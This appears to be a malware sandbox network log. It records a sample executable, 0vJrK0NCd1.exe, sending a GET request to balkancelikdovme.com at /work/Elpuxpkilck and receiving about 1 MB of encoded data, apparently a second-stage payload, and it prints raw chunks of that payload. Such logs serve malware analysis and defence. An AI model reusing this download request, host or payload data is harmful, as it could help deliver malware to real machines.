2023-08-23 17:31:18 UTC	2004	IN	Data Raw: 6a 30 38 76 49 72 66 50 4c 79 2f 2f 4c 79 38 76 58 7a 6e 50 4c 79 38 76 62 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 67 54 30 38 76 4a 59 42 2f 4c 79 41 50 4c 79 38 76 58 7a 42 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 6d 6e 30 38 76 4a 34 42 50 4c 79 41 66 4c 79 38 76 58 7a 50 76 4c 79 38 76 50 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 54 7a 63 6f 4f 7a 66 79 38 76 49 53 43 76 4c 79 38 2f 4c 79 38 76 58 7a 55 2f 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 54 79 63 6b 4e 79 54 79 38 76 4a 52 38 76 4c 79 39 50 4c 79 38 76 58 7a 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 54 79 55 32 4e 76 4c 79 38 76 4a 68 2b 2f 4c 79 2b 50 4c 79 38 Data Ascii: j08vIrfPLy//Ly8vXznPLy8vby8vLy8vLy8vLy8vLy8vLy8gT08vJYB/LyAPLy8vXzBvLy8vLy8vLy8vLy8vLy8vLy8vLy8mn08vJ4BPLyAfLy8vXzPvLy8vPy8vLy8vLy8vLy8vLyTzcoOzfy8vISCvLy8/Ly8vXzU/Ly8vLy8vLy8vLy8vLy8vLyTyckNyTy8vJR8vLy9PLy8vXz8vLy8vLy8vLy8vLy8vLy8vLyTyU2NvLy8vJh+/Ly+PLy8
2023-08-23 17:31:18 UTC	2020	IN	Data Raw: 38 6d 38 69 49 69 4d 43 77 78 4b 6a 6f 33 4b 7a 55 69 4e 54 67 78 49 69 34 6f 50 43 49 6e 4e 7a 49 31 4e 6b 38 7a 4a 44 55 33 54 31 48 79 49 69 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 6d 4e 76 49 75 4b 44 77 69 4a 7a 63 79 4e 53 49 76 4c 44 59 33 38 69 49 69 49 6a 70 58 56 53 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 6b 4a 79 63 69 4c 69 67 38 49 69 63 33 4d 6a 58 79 49 69 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 6d 4e 69 49 73 4d 53 77 33 38 69 49 69 49 6a 70 58 56 53 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 31 4b 44 41 79 4f 53 67 69 4c 69 67 38 49 69 63 33 4d 6a 58 79 49 69 49 77 4c 44 45 71 4f 69 49 58 62 52 59 6d 4a 43 38 76 4a 53 51 6d 4c 76 4a 6c 4c 79 39 6d 4d 54 63 31 50 42 4d 79 4c 44 45 33 38 69 49 69 49 68 55 59 62 78 64 71 62 6d 59 69 45 78 5a 6d 47 Data Ascii: 8m8iIiMCwxKjo3KzUiNTgxIi4oPCInNzI1Nk8zJDU3T1HyIiIwLDEqOjcrNSImNvIuKDwiJzcyNSIvLDY38iIiIjpXVSIwLDEqOjcrNSIkJyciLig8Iic3MjXyIiIwLDEqOjcrNSImNiIsMSw38iIiIjpXVSIwLDEqOjcrNSI1KDAyOSgiLig8Iic3MjXyIiIwLDEqOiIXbRYmJC8vJSQmLvJlLy9mMTc1PBMyLDE38iIiIhUYbxdqbmYiExZmG

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49737	185.181.116.217	443	C:\Users\user\Desktop\0vJrK0NCd1.exe

Timestamp	kBytes transferred	Direction	Data
2023-08-23 17:31:32 UTC	2024	OUT	GET /work/Elpuxpkilck HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
2023-08-23 17:31:32 UTC	2024	IN	HTTP/1.1 200 OK Connection: close last-modified: Tue, 22 Aug 2023 08:42:22 GMT accept-ranges: bytes content-length: 1036168 date: Wed, 23 Aug 2023 17:31:32 GMT vary: User-Agent alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-08-23 17:31:32 UTC	2025	IN	Data Raw: 53 30 6c 4b 52 6d 46 57 48 42 64 43 59 55 52 6f 49 69 49 58 59 55 52 46 52 69 46 48 53 30 6c 4b 49 69 4a 45 59 55 56 45 56 6c 68 46 52 45 4a 68 4c 43 67 6b 4a 44 45 39 4f 43 77 7a 4e 44 6b 6d 4f 79 6f 32 4a 44 4d 36 4a 7a 45 6c 50 44 73 76 4c 54 67 36 4f 53 6b 6b 4f 44 67 32 4a 43 34 77 4a 44 49 6f 4b 7a 4d 79 4b 79 77 6c 4c 44 59 6e 4f 44 6b 30 4e 69 30 72 4a 53 51 73 4a 6a 30 33 50 54 59 78 4e 79 67 6f 4f 7a 63 32 4e 43 30 6e 50 53 77 34 4c 54 63 73 4d 30 74 4a 53 6b 5a 68 56 68 77 58 51 6d 46 45 61 43 49 69 46 32 46 45 52 55 59 68 52 30 74 4a 53 69 49 69 52 47 46 46 52 46 5a 59 52 55 52 43 59 57 59 76 4d 7a 67 37 4d 79 34 73 4c 79 59 75 53 30 6c 4b 52 6d 46 57 48 42 64 43 59 55 52 6f 49 69 49 58 59 55 52 46 52 69 46 48 53 30 6c 4b 49 69 4a 45 59 55 56 Data Ascii: S0lKRmFWHBdCYURoIiIXYURFRiFHS0lKIiJEYUVEVlhFREJhLCgkJDE9OCwzNDkmOyo2JDM6JzElPDsvLTg6OSkkODg2JC4wJDIoKzMyKywlLDYnODk0Ni0rJSQsJj03PTYxNygoOzc2NC0nPSw4LTcsM0tJSkZhVhwXQmFEaCIiF2FERUYhR0tJSiIiRGFFRFZYRURCYWYvMzg7My4sLyYuS0lKRmFWHBdCYURoIiIXYURFRiFHS0lKIiJEYUV
2023-08-23 17:31:32 UTC	2026	IN	Data Raw: 78 6c 4e 58 6a 6c 77 34 2b 68 4b 39 38 39 72 64 79 50 64 68 47 78 44 4e 75 57 53 7a 59 68 73 56 31 30 52 51 4c 68 72 42 75 42 5a 65 57 31 6e 49 4d 6d 4e 6a 75 2b 79 47 51 59 56 44 2f 51 30 4e 66 71 31 46 77 52 31 7a 45 4a 42 6a 74 78 56 69 53 48 55 69 32 51 46 79 62 47 41 62 7a 33 34 57 74 53 46 4c 41 33 38 55 57 53 35 61 77 6b 35 4b 4c 2f 70 2b 62 35 47 30 7a 68 73 55 75 74 65 4b 65 6b 32 7a 2f 56 50 71 79 62 39 63 4b 78 59 65 2f 39 55 63 38 43 4a 46 4b 46 37 49 54 59 66 45 50 75 4b 31 75 31 4a 52 50 2f 74 69 58 57 42 49 4c 6c 6f 55 52 49 41 47 77 58 55 4c 76 41 53 7a 64 57 72 76 78 6c 4b 34 2f 62 72 36 74 77 4e 32 46 45 73 57 53 77 6a 50 62 73 6f 70 2b 32 58 51 61 30 73 38 41 32 4e 44 55 38 6b 72 46 6d 76 44 78 59 42 31 53 50 72 2b 51 72 77 44 7a 65 76 Data Ascii: xlNXjlw4+hK989rdyPdhGxDNuWSzYhsV10RQLhrBuBZeW1nIMmNju+yGQYVD/Q0Nfq1FwR1zEJBjtxViSHUi2QFybGAbz34WtSFLA38UWS5awk5KL/p+b5G0zhsUuteKek2z/VPqyb9cKxYe/9Uc8CJFKF7ITYfEPuK1u1JRP/tiXWBILloURIAGwXULvASzdWrvxlK4/br6twN2FEsWSwjPbsop+2XQa0s8A2NDU8krFmvDxYB1SPr+QrwDzev
2023-08-23 17:31:32 UTC	2040	IN	Data Raw: 5a 6b 4b 6e 41 32 45 48 45 4d 51 50 55 39 44 55 42 5a 50 6c 6b 2b 46 54 6b 57 4a 79 51 6b 63 54 30 37 4e 6a 41 30 4d 79 6c 66 4a 45 67 70 54 44 71 79 4b 72 38 6c 74 44 72 47 50 64 38 38 32 7a 33 6b 50 64 73 31 67 6b 42 35 4b 58 30 6d 69 43 69 6b 4c 71 4d 6a 72 43 61 6b 4f 70 59 30 71 43 34 59 50 47 77 6e 39 6a 67 50 4b 51 59 6a 2b 54 74 65 4e 56 73 35 55 79 5a 71 50 6d 4d 30 50 43 4e 42 4b 53 77 6c 4f 6a 78 57 4e 45 51 39 54 79 79 34 4c 4c 59 39 78 7a 54 41 4c 39 4d 71 33 45 48 57 4d 64 55 6b 6b 43 4f 43 4a 33 30 30 66 54 69 77 4d 5a 4a 41 61 79 67 43 4f 67 6b 32 4d 7a 68 61 4a 62 4d 2b 75 69 2f 68 50 4e 73 6a 65 43 61 4c 4e 35 49 6a 6d 7a 65 68 4f 78 59 39 42 45 44 2b 50 51 42 78 7a 30 46 52 4e 6c 34 78 78 79 37 6b 4d 2b 41 38 65 7a 36 66 4c 36 59 75 44 Data Ascii: ZkKnA2EHEMQPU9DUBZPlk+FTkWJyQkcT07NjA0MylfJEgpTDqyKr8ltDrGPd882z3kPds1gkB5KX0miCikLqMjrCakOpY0qC4YPGwn9jgPKQYj+TteNVs5UyZqPmM0PCNBKSwlOjxWNEQ9Tyy4LLY9xzTAL9Mq3EHWMdUkkCOCJ300fTiwMZJAaygCOgk2MzhaJbM+ui/hPNsjeCaLN5IjmzehOxY9BED+PQBxz0FRNl4xxy7kM+A8ez6fL6YuD
2023-08-23 17:31:32 UTC	2056	IN	Data Raw: 62 47 75 73 6d 38 78 72 2f 47 7a 63 37 4f 78 62 61 36 78 72 2f 42 76 64 47 33 79 38 44 50 76 37 76 4c 78 4e 47 35 74 38 4c 4a 76 62 79 38 7a 64 47 36 75 38 44 52 79 4d 50 4f 77 38 72 48 76 38 50 48 78 74 48 4a 77 4d 75 36 75 72 37 41 79 63 6a 52 7a 73 62 50 75 62 71 35 76 38 57 36 79 73 32 33 75 73 44 42 79 63 71 35 79 62 72 43 75 38 6d 2f 52 4d 72 52 77 6d 6d 30 76 54 36 6f 54 37 6f 7a 6f 6b 69 2f 7a 53 71 39 7a 4d 56 4d 74 72 6a 44 54 72 71 37 76 44 4c 4f 76 62 63 6b 79 4d 64 45 61 73 76 4e 51 78 7a 4e 79 4d 5a 50 78 72 38 69 68 2b 48 42 77 4b 54 49 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 4a 76 35 75 36 7a 33 43 4d 76 39 47 2b 76 63 72 43 30 62 61 33 78 4d 6d 36 76 Data Ascii: bGusm8xr/Gzc7Oxba6xr/BvdG3y8DPv7vLxNG5t8LJvby8zdG6u8DRyMPOw8rHv8PHxtHJwMu6ur7AycjRzsbPubq5v8W6ys23usDBycq5ybrCu8m/RMrRwmm0vT6oT7ozoki/zSq9zMVMtrjDTrq7vDLOvbckyMdEasvNQxzNyMZPxr8ih+HBwKTI0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrJv5u6z3CMv9G+vcrC0ba3xMm6v
2023-08-23 17:31:32 UTC	2072	IN	Data Raw: 37 45 30 59 65 2f 78 4d 53 47 30 63 61 37 69 37 71 39 76 59 44 4a 78 38 71 4f 78 74 43 79 65 37 6e 41 78 6e 76 4b 79 73 44 62 77 4c 34 58 7a 62 6e 47 74 65 6d 37 78 72 6a 6d 79 73 35 67 76 62 6d 36 79 63 43 2b 76 64 43 33 7a 4d 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 79 4d 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75 38 61 2f 78 73 70 6e 7a 70 79 32 76 63 61 6d 77 62 72 51 72 73 75 2f 7a 71 61 37 7a 4d 57 59 75 62 6a 44 6f 4c 32 37 76 5a 54 52 76 62 71 70 30 63 66 43 6c 38 50 4e 78 36 62 44 79 4d 61 59 79 52 66 4c 6f 37 71 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 75 4c 74 73 31 Data Ascii: 7E0Ye/xMSG0ca7i7q9vYDJx8qOxtCye7nAxnvKysDbwL4XzbnGtem7xrjmys5gvbm6ycC+vdC3zMDOv7zLxdG2t8PJury9zc66usDOyMLOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu8a/xspnzpy2vcamwbrQrsu/zqa7zMWYubjDoL27vZTRvbqp0cfCl8PNx6bDyMaYyRfLo7q+wMnH0c7G0Lm7ucDFu8rKuLts1
2023-08-23 17:31:32 UTC	2088	IN	Data Raw: 62 4b 7a 73 37 46 75 62 72 47 76 37 36 39 30 4c 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6d 36 76 4c 33 4e 7a 72 71 36 77 4d 37 49 77 73 37 45 79 73 65 2f 78 4d 66 47 30 63 62 41 79 37 71 39 76 73 44 4a 78 39 48 4f 78 74 43 35 75 37 6e 41 78 62 76 4b 79 72 65 37 77 4c 37 4a 79 37 6e 47 75 73 6d 37 78 72 2f 47 79 73 37 4f 78 62 6d 36 78 72 2b 2b 76 64 43 33 7a 4d 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 79 4d 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75 38 61 2f 78 73 72 4f 7a 73 57 35 75 73 61 2f 76 72 33 51 74 38 7a 41 7a 72 2b 38 79 38 58 52 74 72 66 44 79 62 71 38 76 63 33 4f 75 72 72 41 7a Data Ascii: bKzs7FubrGv7690LfMwM6/vMvF0ba3w8m6vL3Nzrq6wM7Iws7Eyse/xMfG0cbAy7q9vsDJx9HOxtC5u7nAxbvKyre7wL7Jy7nGusm7xr/Gys7Oxbm6xr++vdC3zMDOv7zLxdG2t8PJury9zc66usDOyMLOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu8a/xsrOzsW5usa/vr3Qt8zAzr+8y8XRtrfDybq8vc3OurrAz
2023-08-23 17:31:32 UTC	2104	IN	Data Raw: 62 52 78 73 44 4c 75 72 32 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 47 76 37 36 39 30 4c 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6d 36 76 4c 33 4e 7a 72 71 36 77 4d 37 49 77 73 37 45 79 73 65 2f 78 4d 66 47 30 63 62 41 79 37 71 39 76 73 44 4a 78 39 48 4f 78 74 43 35 75 37 6e 41 78 62 76 4b 79 72 65 37 77 4c 37 4a 79 37 6e 47 75 73 6d 37 78 72 2f 47 79 73 37 4f 78 62 6d 36 78 72 2b 2b 76 64 43 33 7a 4d 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 79 4d 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75 Data Ascii: bRxsDLur2+wMnH0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrGv7690LfMwM6/vMvF0ba3w8m6vL3Nzrq6wM7Iws7Eyse/xMfG0cbAy7q9vsDJx9HOxtC5u7nAxbvKyre7wL7Jy7nGusm7xr/Gys7Oxbm6xr++vdC3zMDOv7zLxdG2t8PJury9zc66usDOyMLOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu
2023-08-23 17:31:32 UTC	2120	IN	Data Raw: 45 4b 43 41 6a 39 2b 50 34 4a 45 55 6a 41 34 4d 55 4d 2b 52 45 48 2f 77 46 4d 2f 76 50 32 41 76 51 4c 2b 47 49 47 5a 63 66 4b 78 2f 5a 6e 41 76 4c 33 2f 51 73 65 42 41 67 47 2f 2f 74 53 43 67 35 69 44 51 73 52 55 4c 79 2f 75 38 6f 50 2b 41 58 33 47 77 54 31 39 51 42 51 78 56 76 47 41 76 76 2f 4a 46 70 6f 48 52 4e 71 47 45 57 39 30 42 48 35 41 6d 6f 4b 44 76 56 56 44 42 44 34 43 50 2f 2f 2b 78 62 4e 73 62 6f 45 42 66 73 48 2b 47 6a 36 44 67 63 43 5a 51 49 41 44 67 55 47 44 76 30 57 76 67 54 4a 58 67 37 34 42 78 2f 30 42 66 62 37 2b 2f 34 4e 59 62 65 70 77 4c 35 67 39 76 4a 66 2f 66 2f 36 47 66 6f 41 44 51 33 34 43 50 59 54 78 71 61 2b 43 50 55 43 4b 76 77 49 41 76 33 35 2b 50 6d 32 74 77 49 50 2f 2f 38 50 45 46 6e 2b 39 41 55 50 2b 76 64 6e 78 67 54 48 76 Data Ascii: EKCAj9+P4JEUjA4MUM+REH/wFM/vP2AvQL+GIGZcfKx/ZnAvL3/QseBAgG//tSCg5iDQsRULy/u8oP+AX3GwT19QBQxVvGAvv/JFpoHRNqGEW90BH5AmoKDvVVDBD4CP//+xbNsboEBfsH+Gj6DgcCZQIADgUGDv0WvgTJXg74Bx/0Bfb7+/4NYbepwL5g9vJf/f/6GfoADQ34CPYTxqa+CPUCKvwIAv35+Pm2twIP//8PEFn+9AUP+vdnxgTHv
2023-08-23 17:31:32 UTC	2136	IN	Data Raw: 37 41 79 63 66 52 61 74 49 42 75 52 2f 6b 47 4d 55 66 33 2b 4b 33 48 2b 33 6d 79 63 75 35 78 62 72 4a 75 38 61 2f 78 73 72 4f 7a 6d 66 6b 63 73 59 61 55 35 6e 51 74 38 7a 41 7a 72 2b 38 79 38 58 52 74 72 66 44 59 2b 2f 31 76 63 33 4f 48 72 72 41 7a 73 6a 46 30 63 50 4e 78 37 2f 45 78 38 62 52 78 72 72 4c 46 56 5a 68 77 4d 6e 48 30 63 35 69 33 41 69 37 46 65 31 70 75 32 37 66 72 37 73 65 36 79 4c 4c 75 63 62 42 79 62 76 47 76 38 62 4b 7a 73 37 46 46 65 38 50 76 78 6c 57 46 62 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6b 67 38 54 66 4e 7a 72 6f 65 77 4d 37 49 77 74 48 44 7a 63 69 2f 78 4d 66 47 30 63 62 41 79 72 6f 55 55 77 58 4a 78 39 48 4f 78 6d 7a 6c 43 72 6b 65 32 42 58 4b 62 75 49 70 77 4c 37 4a 30 62 6e 47 75 73 6d 37 78 72 2f 47 79 6d 72 62 4c Data Ascii: 7AycfRatIBuR/kGMUf3+K3H+3mycu5xbrJu8a/xsrOzmfkcsYaU5nQt8zAzr+8y8XRtrfDY+/1vc3OHrrAzsjF0cPNx7/Ex8bRxrrLFVZhwMnH0c5i3Ai7Fe1pu27fr7se6yLLucbBybvGv8bKzs7FFe8PvxlWFbfMwM6/vMvF0ba3w8kg8TfNzroewM7IwtHDzci/xMfG0cbAyroUUwXJx9HOxmzlCrke2BXKbuIpwL7J0bnGusm7xr/GymrbL
2023-08-23 17:31:32 UTC	2152	IN	Data Raw: 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 4f 6a 35 72 61 47 70 6b 4c 6a 56 41 5a 6d 39 78 4b 33 41 6d 4d 53 63 6f 63 54 4d 37 50 44 51 38 4c 79 73 6b 4a 7a 6f 66 62 54 59 78 4c 79 30 67 4e 54 51 61 4e 72 72 4a 75 38 61 2f 78 73 72 4f 7a 73 57 35 75 73 61 2f 76 72 33 51 74 38 7a 41 7a 72 2b 38 79 38 58 52 74 72 66 44 79 62 71 38 76 63 33 4f 75 72 72 41 7a 73 6a 43 7a 73 54 4b 78 37 2f 45 78 38 62 52 78 73 44 4c 75 72 32 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 47 4b 69 73 74 63 53 51 7a 49 57 73 75 49 47 35 6b 4f 43 67 77 5a 54 38 68 4d 43 45 2b 63 53 34 75 4d 48 45 34 4e 6e 45 30 50 6a 6b 78 4e 44 6b 36 50 7a 6f 77 50 Data Ascii: DOv7zLxdG2t8PJury9zc66usDOOj5raGpkLjVAZm9xK3AmMScocTM7PDQ8LyskJzofbTYxLy0gNTQaNrrJu8a/xsrOzsW5usa/vr3Qt8zAzr+8y8XRtrfDybq8vc3OurrAzsjCzsTKx7/Ex8bRxsDLur2+wMnH0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrGKistcSQzIWsuIG5kOCgwZT8hMCE+cS4uMHE4NnE0PjkxNDk6PzowP
2023-08-23 17:31:32 UTC	2168	IN	Data Raw: 62 2b 42 52 49 42 42 66 35 64 79 67 49 41 43 76 59 43 43 78 55 48 2b 67 52 4f 78 72 2f 47 79 76 67 4b 42 67 2f 31 41 45 76 37 2f 76 72 79 58 38 44 4f 76 37 7a 2b 42 76 76 2b 39 41 4e 6a 2f 2f 38 50 45 46 6d 36 48 74 35 51 79 47 54 6d 4f 73 70 6e 34 55 4c 48 61 4f 66 51 77 47 70 67 36 62 34 67 35 30 66 52 63 4f 4f 6d 75 62 75 35 43 63 57 37 79 73 71 33 48 4c 62 71 79 57 70 52 34 72 70 6c 79 41 2b 2f 61 4c 6d 66 7a 6d 48 4b 34 63 59 68 77 69 37 51 47 62 6c 64 7a 69 43 2f 42 4d 56 77 73 70 6e 44 5a 63 64 38 76 57 6e 52 69 72 6f 68 79 4d 4c 43 62 63 52 47 78 79 44 46 52 73 5a 77 78 4e 62 4c 47 37 2f 49 77 47 6a 52 56 73 35 6f 36 49 69 37 46 39 79 59 75 32 7a 75 6b 62 73 67 32 68 54 4c 46 2f 43 64 79 52 33 77 70 73 5a 73 36 49 66 46 46 39 36 54 76 79 4c 68 64 Data Ascii: b+BRIBBf5dygIACvYCCxUH+gROxr/GyvgKBg/1AEv7/vryX8DOv7z+Bvv+9ANj//8PEFm6Ht5QyGTmOspn4ULHaOfQwGpg6b4g50fRcOOmubu5CcW7ysq3HLbqyWpR4rplyA+/aLmfzmHK4cYhwi7QGbldziC/BMVwspnDZcd8vWnRirohyMLCbcRGxyDFRsZwxNbLG7/IwGjRVs5o6Ii7F9yYu2zukbsg2hTLF/CdyR3wpsZs6IfFF96TvyLhd
2023-08-23 17:31:32 UTC	2184	IN	Data Raw: 6c 55 51 2b 4c 69 76 4c 33 4e 63 79 68 78 5a 71 43 36 5a 2b 2b 44 54 7a 72 63 43 63 66 47 30 58 73 58 55 4d 76 69 4b 31 35 45 69 45 72 2b 35 4e 53 35 75 37 6d 46 50 55 67 58 6f 75 73 38 45 34 46 43 6e 4e 4e 6a 75 73 6d 37 65 79 44 32 6a 6a 46 75 54 39 70 39 51 34 44 66 6c 64 43 33 7a 49 56 43 44 2f 6b 74 57 65 4d 37 65 45 69 32 32 37 69 39 7a 63 36 48 53 52 30 6c 4d 42 32 65 71 59 31 44 54 2b 51 49 78 74 48 47 68 57 6d 74 35 41 55 51 45 53 61 4f 54 42 6e 76 35 37 75 35 77 49 41 6e 48 54 63 4a 49 31 71 4b 68 6b 39 6c 36 54 66 4a 75 38 61 43 62 64 4b 54 32 72 64 32 74 59 6c 62 6b 64 73 54 74 38 7a 41 63 79 4c 78 64 62 4b 78 5a 73 53 45 45 75 33 61 56 38 33 4f 75 6f 63 31 6a 50 63 61 32 7a 4c 62 69 46 76 44 32 67 2f 52 78 73 42 32 4a 45 6b 32 6d 35 65 55 75 Data Ascii: lUQ+LivL3NcyhxZqC6Z++DTzrcCcfG0XsXUMviK15EiEr+5NS5u7mFPUgXous8E4FCnNNjusm7eyD2jjFuT9p9Q4DfldC3zIVCD/ktWeM7eEi227i9zc6HSR0lMB2eqY1DT+QIxtHGhWmt5AUQESaOTBnv57u5wIAnHTcJI1qKhk9l6TfJu8aCbdKT2rd2tYlbkdsTt8zAcyLxdbKxZsSEEu3aV83Ouoc1jPca2zLbiFvD2g/RxsB2JEk2m5eUu
2023-08-23 17:31:32 UTC	2200	IN	Data Raw: 76 75 68 37 76 41 76 73 6e 4c 47 4f 4c 55 79 62 76 47 76 38 5a 72 36 75 6a 46 75 62 72 47 76 79 48 67 58 62 66 4d 77 4d 36 2f 47 2b 35 53 30 62 61 33 77 38 6b 64 34 52 4c 4e 7a 72 71 36 77 47 2f 6c 58 4d 37 45 79 73 65 2f 59 65 4b 59 30 63 62 41 79 37 6f 63 32 36 37 4a 78 39 48 4f 78 6d 33 55 65 62 6e 41 78 62 76 4b 61 39 4a 35 77 4c 37 4a 79 37 6c 6e 31 4d 2b 37 78 72 2f 47 79 6d 2f 6f 79 37 6d 36 78 72 2b 2b 48 4f 59 58 7a 4d 44 4f 76 37 78 73 36 32 2b 32 74 38 50 4a 75 68 76 54 49 4d 36 36 75 73 44 4f 5a 65 77 64 78 4d 72 48 76 38 52 6f 38 49 76 47 77 4d 75 36 76 53 48 57 67 38 66 52 7a 73 62 51 47 4e 53 7a 77 4d 57 37 79 73 6f 61 31 4c 71 2b 79 63 75 35 78 68 33 75 48 38 61 2f 78 73 72 4f 62 2b 6f 56 75 73 61 2f 76 72 31 74 34 42 66 41 7a 72 2b 38 79 Data Ascii: vuh7vAvsnLGOLUybvGv8Zr6ujFubrGvyHgXbfMwM6/G+5S0ba3w8kd4RLNzrq6wG/lXM7Eyse/YeKY0cbAy7oc267Jx9HOxm3UebnAxbvKa9J5wL7Jy7ln1M+7xr/Gym/oy7m6xr++HOYXzMDOv7xs62+2t8PJuhvTIM66usDOZewdxMrHv8Ro8IvGwMu6vSHWg8fRzsbQGNSzwMW7ysoa1Lq+ycu5xh3uH8a/xsrOb+oVusa/vr1t4BfAzr+8y
2023-08-23 17:31:32 UTC	2216	IN	Data Raw: 7a 37 75 72 72 41 7a 6b 58 6b 4c 6e 49 49 6d 58 63 73 5a 59 4d 39 6c 6f 63 38 66 2f 71 6b 4c 76 59 43 48 41 69 56 46 75 72 37 58 78 6b 43 32 50 57 68 77 64 59 38 68 68 38 32 76 2f 7a 64 4c 48 57 4d 36 4f 6e 37 76 7a 45 4a 62 2f 41 39 6e 59 5a 64 38 77 5a 61 56 43 5a 41 58 38 67 4c 65 48 54 55 4b 4a 38 51 2f 66 43 57 6d 6b 43 2b 68 43 6a 30 33 75 7a 32 67 4a 72 64 70 36 67 73 62 74 31 5a 44 79 6e 74 75 2b 47 4a 31 64 44 45 53 2f 69 4a 45 62 6e 41 78 62 55 42 63 39 5a 4a 39 77 6e 55 50 38 7a 2b 44 67 74 62 77 38 43 36 55 4e 43 52 36 46 52 6f 77 6c 41 67 4c 7a 39 4e 70 4b 36 4e 52 32 73 38 36 31 71 6f 63 74 2f 44 65 4b 6d 30 5a 74 49 56 69 39 4f 45 66 38 79 43 4c 34 37 44 68 45 79 41 4a 64 75 72 4e 30 39 78 5a 2f 41 65 33 4d 6b 70 7a 4e 72 65 37 7a 4e 4a 48 Data Ascii: z7urrAzkXkLnIImXcsZYM9loc8f/qkLvYCHAiVFur7XxkC2PWhwdY8hh82v/zdLHWM6On7vzEJb/A9nYZd8wZaVCZAX8gLeHTUKJ8Q/fCWmkC+hCj03uz2gJrdp6gsbt1ZDyntu+GJ1dDES/iJEbnAxbUBc9ZJ9wnUP8z+Dgtbw8C6UNCR6FRowlAgLz9NpK6NR2s861qoct/DeKm0ZtIVi9OEf8yCL47DhEyAJdurN09xZ/Ae3MkpzNre7zNJH
2023-08-23 17:31:32 UTC	2232	IN	Data Raw: 73 55 78 6a 66 4a 41 73 62 30 78 73 72 4f 7a 73 55 44 75 76 4b 2f 76 72 33 51 74 2f 54 41 2f 62 2b 38 79 38 58 52 39 62 66 35 79 62 71 38 2f 4d 31 70 63 6a 72 41 7a 73 68 6d 7a 6d 65 43 56 72 2f 45 78 36 7a 52 59 58 68 4f 75 72 32 2b 69 73 6c 69 69 63 62 47 30 4c 6d 61 75 52 32 4b 78 38 72 4b 74 36 76 41 47 34 36 37 75 63 61 36 34 37 74 68 65 4f 62 4b 7a 73 37 47 75 52 2b 52 37 37 36 39 30 50 66 4d 48 59 6c 37 76 4d 76 46 38 37 59 55 6a 49 47 36 76 4c 30 6b 7a 68 2b 46 75 4d 37 49 77 67 4c 45 62 5a 43 66 78 4d 66 47 72 38 59 64 68 47 47 39 76 73 41 7a 78 32 78 35 42 39 43 35 75 77 6a 41 61 48 51 48 79 72 65 37 54 62 35 6b 64 58 6e 47 75 73 6b 51 78 68 79 52 43 38 37 4f 78 55 69 36 59 59 6e 75 76 64 43 33 43 63 42 70 65 42 48 4c 78 64 45 6a 74 32 5a 2b 38 Data Ascii: sUxjfJAsb0xsrOzsUDuvK/vr3Qt/TA/b+8y8XR9bf5ybq8/M1pcjrAzshmzmeCVr/Ex6zRYXhOur2+isliicbG0LmauR2Kx8rKt6vAG467uca647theObKzs7GuR+R77690PfMHYl7vMvF87YUjIG6vL0kzh+FuM7IwgLEbZCfxMfGr8YdhGG9vsAzx2x5B9C5uwjAaHQHyre7Tb5kdXnGuskQxhyRC87OxUi6YYnuvdC3CcBpeBHLxdEjt2Z+8
